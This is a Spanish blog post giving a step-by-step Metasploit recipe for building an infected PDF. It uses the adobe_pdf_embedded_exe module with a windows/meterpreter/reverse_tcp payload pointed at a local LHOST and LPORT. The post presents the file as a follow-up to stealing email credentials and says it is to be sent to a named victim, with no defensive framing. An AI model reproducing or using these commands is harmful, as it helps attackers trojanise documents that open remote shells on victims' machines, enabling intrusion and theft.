martes, 19 de abril de 2016

Aprende a cocinar un PDF infectado


Ayer os hablé de cómo se podía obtener el usuario y contraseña de un correo, y en uno de los pasos, narraba que era necesario infectar un PDF, por eso, hoy os contaré paso a paso cómo se podría infectar un PDF usando Metasploit.


Lo primero evidentemente es cargar metasploit con el comando msfconsole



Ahora preparamos un exploit que ejecutará a  la víctima, un Payload, cuando abra el PDF, para esto, usamos el código use exploit/windows/fileformat/adobe_pdf_embedded_exe, además de asignarle un nombre determinado.






Ahora le indicamos el directorio del fichero PDF original a infectar con el Código:
set INFILENAME /home/bugtraq/Hacking/Manuales/mitm.pdf

Indicamos a metasploit el directorio de salida con el  Código:
set OUTPUTPATH /home/bugtraq/

Vamos a cargar el PAYLOAD a utilizar, en nuestro caso un reverse_tcp: set PAYLOAD windows/meterpreter/reverse_tcp
Ahora  configuramos ahora nuestra ip con set LHOST 192.168.0.199
Indicando  el puerto con  set LPORT 4455



Ahora toca ponerse a cocinar en el laboratorio como en Breaking Bad, el exploir en nuestro caso. Para esto, le indicaremos a nuestro exploit, el payload con un meterpreter, y esto se realiza con este código set PAYLOAD windows/meterpreter/reverse_tcp añadiendo posteriormente la dirección ip y el puerto y la id que sea igual a 0.



Quedándonos finalmente un exploit rico rico y con fudamento, y solo nos quedaría enviárselo a la víctima que deseemos, por ejemplo, yo se lo voy a enviar a un trabajador de SoftCrim que se llama Sergi y es catalán, ya sabéis, por todo lo que le ha pasado en Champions :P


Así de sencillo es "cocinar" un exploit para infectar un PDF, ahora sois vosotros los que debéis practicar un poco, ya que así es la única manera de aprender

No hay comentarios:

Publicar un comentario

Related Posts Plugin for WordPress, Blogger...

Entrada destacada

El server me sabe a poco.

Soy un fanático del Rock y de Debian . (Creo que voy a inventar Rockbian, que suena bien y todo xD) Llevaba tiempo queriendo unir estos 2 c...